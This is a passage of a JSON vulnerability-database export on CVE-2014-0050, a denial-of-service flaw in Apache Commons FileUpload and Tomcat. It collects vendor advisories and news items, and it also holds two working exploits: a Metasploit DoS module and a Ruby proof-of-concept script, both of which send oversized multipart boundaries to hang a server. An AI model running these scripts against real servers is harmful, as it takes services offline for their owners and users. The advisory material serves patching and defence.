FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 are advised to upgrade to these\nupdated tomcat6 packages, which contain backported patches to correct these\nissues. The Red Hat JBoss Web Server process must be restarted for the\nupdate to take effect.", "modified": "2018-08-09T19:46:59", "published": "2014-05-21T19:09:00", "id": "RHSA-2014:0525", "href": "https://access.redhat.com/errata/RHSA-2014:0525", "type": "redhat", "title": "(RHSA-2014:0525) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat6 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6440", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "description": "Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.\nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nThis release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update\nto Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files.\n\nThe following security issues are also addressed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. A remote attacker could use this flaw to read files\naccessible to the user running the application server and, potentially,\nperform other more advanced XXE attacks. (CVE-2013-6440)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XXE attacks. (CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing Apache Commons FileUpload to enter an infinite\nloop when processing such an incoming request. (CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6440 issue was\ndiscovered by David Illsley, Ron Gutierrez of Gotham Digital Science, and\nDavid Jorm of the Red Hat Security Response Team.\n\nAll users of Fuse ESB Enterprise/MQ Enterprise 7.1.0 as provided from the\nRed Hat Customer Portal are advised to upgrade to Fuse ESB Enterprise/MQ\nEnterprise 7.1.0 R1 P3.\n", "modified": "2019-03-22T23:43:52", "published": "2014-04-30T04:00:00", "id": "RHSA-2014:0452", "href": "https://access.redhat.com/errata/RHSA-2014:0452", "type": "redhat", "title": "(RHSA-2014:0452) Important: Fuse ESB Enterprise/Fuse MQ Enterprise 7.1.0 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2020-12-24T14:35:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "edition": 9, "modified": "2018-10-11T08:42:37", "published": "2014-02-10T05:56:15", "id": "ATLASSIAN:CONFSERVER-32557", "href": "https://jira.atlassian.com/browse/CONFSERVER-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-03-22T18:16:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "modified": "2017-02-17T04:33:34", "published": "2014-02-10T05:56:15", "href": "https://jira.atlassian.com/browse/CONF-32557", "id": "ATLASSIAN:CONF-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-10-08T00:36:32", "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0 through 1.3 via a specially crafted Content-Type header. Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50 and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also uses Commons FileUpload as part of the Manager application.\n", "published": "2014-02-22T13:56:59", "type": "metasploit", "title": "Apache Commons FileUpload and Apache Tomcat DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',\n 'Description' => %q{\n This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.\n },\n 'Author' =>\n [\n 'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.\n 'ribeirux' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-0050'],\n ['URL', 'http://tomcat.apache.org/security-8.html'],\n ['URL', 'http://tomcat.apache.org/security-7.html']\n ],\n 'DisclosureDate' => '2014-02-06'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, \"The request URI\", '/']),\n OptInt.new('RLIMIT', [ true, \"Number of requests to send\",50])\n ])\n end\n\n def run\n boundary = \"0\"*4092\n opts = {\n 'method' => \"POST\",\n 'uri' => normalize_uri(target_uri.to_s),\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => \"#{boundary}00000\",\n 'headers' => {\n 'Accept' => '*/*'\n }\n }\n\n # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby\n # This should be rewritten with 1.upto() or Enumerable#each or\n # something\n for x in 1..datastore['RLIMIT']\n print_status(\"Sending request #{x} to #{peer}\")\n begin\n c = connect\n r = c.request_cgi(opts)\n c.send_request(r)\n # Don't wait for a response\n rescue ::Rex::ConnectionError => exception\n print_error(\"Unable to connect: '#{exception.message}'\")\n return\n ensure\n disconnect(c) if c\n end\n end\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb"}], "github": [{"lastseen": "2020-03-10T23:26:06", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.", "edition": 2, "modified": "2019-07-03T21:02:05", "published": "2018-12-21T17:51:42", "id": "GHSA-XX68-JFCG-XMMF", "href": "https://github.com/advisories/GHSA-xx68-jfcg-xmmf", "title": "High severity vulnerability that affects commons-fileupload:commons-fileupload", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2019-05-29T19:49:22", "bulletinFamily": "info", "cvelist": ["CVE-2014-0050"], "description": "\n ## Description\n\nApache Commons FileUpload provided by Apache Software Foundation contains an issue in processing a multi-part request, which may cause the process to be in an infinite loop. \n \nAs of 2014 February 12, an exploit tool to attack against this vulnerability has been confirmed.\n\n ## Impact\n\nProcessing a malformed request may cause the condition that the target system does not respond.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version that contains a fix fot this vulnerability: \n\n * [Apache Commons FileUpload 1.3.1](<http://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi>)\n * [Apache Tomcat 8.0.3](<http://www.apache.org/dist/tomcat/tomcat-8/v8.0.3/>)\n * [Apache Tomcat 7.0.52](<http://www.apache.org/dist/tomcat/tomcat-7/v7.0.52/>)\n * [Apache Struts 2.3.16.1](<http://struts.apache.org/download.cgi#struts23161>)\n**Apply the Patch** \nIn the developer's repository, the respective source code that contains a fix for this vulnerability has been released. \n\n * Apache Commons FileUpload: <http://svn.apache.org/r1565143>\n * Apache Tomcat 8: <http://svn.apache.org/r1565163>\n * Apache Tomcat 7: <http://svn.apache.org/r1565169>\n**Workaround** \nApplying the following workaround may mitigate the effect of this vulnerability. \n\n * Limit the Content-Type header size less than 4091 bytes\nFor more information, please refer to the developer's site. \n\n ## Products Affected\n\n * Commons FileUpload 1.0 to 1.3\n * Apache Tomcat 8.0.0-RC1 to 8.0.1\n * Apache Tomcat 7.0.0 to 7.0.50\n * Products that use Apache Commons FileUpload\nAccording to the developer, Apache Tomcat 6 and earlier are not affected. \n \nThe developer also states that Apache Commons FileUpload is widely used for multiple Apache products, therefore, multiple Apache products other than Apache Tomcat may be affected by this vulnerability. \nAccording to the developer, the following products may be affected. \n\n * Jenkins\n * JSPWiki\n * JXP\n * Lucene-Solr\n * onemind-commons\n * Spring\n * Stapler\n * Struts 1, 2\n * WSDL2c\n", "edition": 4, "modified": "2016-07-12T00:00:00", "published": "2014-02-10T00:00:00", "id": "JVN:14876762", "href": "http://jvn.jp/en/jp/JVN14876762/index.html", "title": "JVN#14876762: Apache Commons FileUpload vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-04T07:03:17", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2014-02-12T00:00:00", "type": "zdt", "title": "Apache Commons FileUpload and Apache Tomcat Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "1337DAY-ID-21887", "href": "https://0day.today/exploit/description/21887", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n puts \"\"\r\n puts \"#################################################################################\"\r\n puts \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n puts \"# #\"\r\n puts \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n puts \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n puts \"# of assisting system administrators in evaluating whether or not #\"\r\n puts \"# their applications are vulnerable to this issue. #\"\r\n puts \"# #\"\r\n puts \"# Please use responsibly. #\"\r\n puts \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = \"\"\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts \"\"\r\n puts \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts \"\"\r\n puts \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts \"Request Launched\"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme==\"https\"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n req.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n req.body = \"b\"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts \"Timeout - continuing DoS...\"\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21887"}], "huawei": [{"lastseen": "2019-02-01T18:02:28", "bulletinFamily": "software", "cvelist": ["CVE-2014-0116", "CVE-2014-0050", "CVE-2014-0094"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2014-07-08T00:00:00", "published": "2014-07-07T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "type": "huawei", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "[0:6.0.24-64]\n- Resolves: CVE-2014-0050\n[0:6.0.24-63]\n- Resolves: CVE-2013-4322 CVE-2013-4286", "edition": 4, "modified": "2014-04-23T00:00:00", "published": "2014-04-23T00:00:00", "id": "ELSA-2014-0429", "href": "http://linux.oracle.com/errata/ELSA-2014-0429.html", "title": "tomcat6 security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0186", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "[0:7.0.42-5]\n- Related: CVE-2013-4286\n- Related: CVE-2013-4322\n- Related: CVE-2014-0050\n- revisit patches for above.", "edition": 4, "modified": "2014-07-20T00:00:00", "published": "2014-07-20T00:00:00", "id": "ELSA-2014-0686", "href": "http://linux.oracle.com/errata/ELSA-2014-0686.html", "title": "tomcat security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0099", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0096", "CVE-2014-0075"], "description": "[0:6.0.24-72]\n- Related: CVE-2014-0075 - rebuild to generate javadoc\n- correctly. previous build generated 0-length javadoc\n[0:6.0.24-69]\n- Related: CVE-2014-0075 incomplete\n[0:6.0.24-68]\n- Related: CVE-2013-4322. arches needs to be specified\n- as in arches noarch, so docs/webapps will produce\n- full files. building for ppc will generate empty\n- javadoc.\n[0:6.0.24-67]\n- Related: CVE-2014-0050\n- Related: CVE-2013-4322\n[0:6.0.24-66]\n- Resolves: CVE-2014-0099\n- Resolves: CVE-2014-0096\n- Resolves: CVE-2014-0075\n[0:6.0.24-65]\n- Related: CVE-2014-0050 copy paste error", "edition": 4, "modified": "2014-07-09T00:00:00", "published": "2014-07-09T00:00:00", "id": "ELSA-2014-0865", "href": "http://linux.oracle.com/errata/ELSA-2014-0865.html", "title": "tomcat6 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:37", "bulletinFamily": "info", "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "description": "VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines.\n\nAll of the vulnerabilities that the company [patched](<http://www.vmware.com/security/advisories/VMSA-2014-0007.html>) lie in the Apache Struts Java application framework, and the most serious of them is CVE-2014-0112, which allows an attacker to run arbitrary code.\n\n\u201cParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to \u201cmanipulate\u201d the ClassLoader and execute arbitrary code via a crafted request,\u201d the vulnerability [description](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112>) says.\n\nApache [fixed](<https://struts.apache.org/announce.html>) the vulnerability in a new release of Struts back in April. The issue was created because of an incomplete patch for a previous vulnerability in Struts. The three Struts vulnerabilities all are addressed in the release of version 5.8.2 of VMware vCOPS, the company said.\n\nThe other two, less serious vulnerabilities fixed in the new version of vCOPS are CVE-2014-0050 and CVE-2014-0094. The first flaw is problem that could lead to a denial-of-service condition if exploited by a remote attacker.\n\n\u201cMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u2019s intended exit conditions,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050>) says.\n\nCVE-2014-0094 is also remotely exploitable by an unauthenticated attacker, who could manipulate a component of Struts.\n\n\u201cThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to \u201cmanipulate\u201d the ClassLoader via the class parameter, which is passed to the getClass method,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0094>) says.\n", "modified": "2014-06-25T19:22:45", "published": "2014-06-25T13:59:49", "id": "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "href": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/", "type": "threatpost", "title": "VMware Patches Apache Struts Flaws in vCOPS", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "description": "The Apache Struts library is updated to version 2.3.16.2 to address multiple security issues. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0050, CVE-2014-0094, and CVE-2014-0112 to these issues. \n \nCVE-2014-0112 may lead to remote code execution. This issue was found to be only partially addressed in CVE-2014-0094. \n \nCVE-2014-0050 may lead to a denial of service condition. \n \nvCenter Operations Management Suite (vCOps) is affected by both CVE-2014-0112 and CVE-2014-0050. Exploitation of CVE-2014-0112 may lead to remote code execution without authentication. \n \nvCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not by CVE-2014-0112. \n \nWorkaround \n \nA workaround for CVE-2014-0112 is documented in VMware Knowledge Base article 2081470. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 4, "modified": "2014-09-09T00:00:00", "published": "2014-06-24T00:00:00", "id": "VMSA-2014-0007", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0007.html", "title": "VMware product updates address security vulnerabilities in Apache Struts library", "type": "vmware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286", "CVE-2014-0033"], "description": "It was discovered that Tomcat incorrectly handled certain inconsistent \nHTTP headers. A remote attacker could possibly use this flaw to conduct \nrequest smuggling attacks. (CVE-2013-4286)\n\nIt was discovered that Tomcat incorrectly handled certain requests \nsubmitted using chunked transfer encoding. A remote attacker could use this \nflaw to cause the Tomcat server to stop responding, resulting in a denial \nof service. (CVE-2013-4322)\n\nIt was discovered that Tomcat incorrectly applied the disableURLRewriting \nsetting when handling a session id in a URL. A remote attacker could \npossibly use this flaw to conduct session fixation attacks. This issue \nonly applied to Ubuntu 12.04 LTS. (CVE-2014-0033)\n\nIt was discovered that Tomcat incorrectly handled malformed Content-Type \nheaders and multipart requests. A remote attacker could use this flaw to \ncause the Tomcat server to stop responding, resulting in a denial of \nservice. This issue only applied to Ubuntu 12.10 and Ubuntu 13.10. \n(CVE-2014-0050)", "edition": 5, "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "id": "USN-2130-1", "href": "https://ubuntu.com/security/notices/USN-2130-1", "title": "Tomcat vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0429\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nAll Tomcat users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032303.html\n\n**Affected packages:**\ntomcat6\ntomcat6-admin-webapps\ntomcat6-docs-webapp\ntomcat6-el-2.1-api\ntomcat6-javadoc\ntomcat6-jsp-2.1-api\ntomcat6-lib\ntomcat6-servlet-2.5-api\ntomcat6-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0429.html", "edition": 3, "modified": "2014-04-23T19:07:14", "published": "2014-04-23T19:07:14", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032303.html", "id": "CESA-2014:0429", "title": "tomcat6 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:11", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0099", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0096", "CVE-2014-0075"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0865\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly.\n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity.\n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code.\nThis update removes the redundant code. (BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario. (BZ#1095602)\n\nAll Tomcat 6 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032441.html\n\n**Affected packages:**\ntomcat6\ntomcat6-admin-webapps\ntomcat6-docs-webapp\ntomcat6-el-2.1-api\ntomcat6-javadoc\ntomcat6-jsp-2.1-api\ntomcat6-lib\ntomcat6-servlet-2.5-api\ntomcat6-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0865.html", "edition": 3, "modified": "2014-07-09T16:09:49", "published": "2014-07-09T16:09:49", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/032441.html", "id": "CESA-2014:0865", "title": "tomcat6 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}